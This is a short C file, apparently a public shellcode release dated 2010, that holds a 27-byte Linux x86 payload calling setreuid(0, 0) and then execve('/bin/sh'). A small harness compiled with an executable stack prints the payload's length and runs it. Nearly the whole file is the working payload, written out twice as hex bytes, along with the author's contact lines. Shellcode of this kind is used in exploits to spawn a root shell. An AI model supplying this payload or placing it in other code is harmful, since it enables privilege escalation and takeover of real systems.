27 bytes small setreuid(0, 0) and execve("/bin/sh") shellcode.
b39b1e8edd62774281ede91780b12563fbf0c380e35771e4e26d37f3abeb79fb
#include <stdio.h>
#include <string.h>
/*
by Magnefikko
22.04.2010
magnefikko@gmail.com
promhyl.oz.pl
Subgroup: #PRekambr
Name: 27 bytes setreuid(0, 0) & execve("/bin/sh") shellcode
Platform: Linux x86
setreuid(0, 0);
execve("/bin/sh", 0, 0);
gcc -Wl,-z,execstack filename.c
shellcode:
\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\xb0\x0b\xcd\x80
*/
int main(){
char shell[] =
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\xb0\x0b\xcd\x80";
printf("by Magnefikko\nmagnefikko@gmail.com\npromhyl.oz.pl\n\nstrlen(shell)
= %d\n", strlen(shell));
(*(void (*)()) shell)();
}